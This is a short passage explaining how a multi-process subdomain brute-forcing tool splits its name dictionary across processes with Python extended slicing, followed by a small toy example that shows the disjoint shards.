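Both multi-process variants above shard the dictionary with an extended slice, normal_lines[self.process_num::self.options.process], so each process takes every N-th name and no coordination between processes is needed. A minimal sketch of that partitioning (toy data, not the real dict files):

names = ['www', 'mail', 'ftp', 'api', 'dev', 'cdn', 'vpn']
process_count = 3

shards = [names[i::process_count] for i in range(process_count)]
# shards[0] == ['www', 'api', 'vpn']
# shards[1] == ['mail', 'dev']
# shards[2] == ['ftp', 'cdn']
assert sorted(sum(shards, [])) == sorted(names)  # disjoint and complete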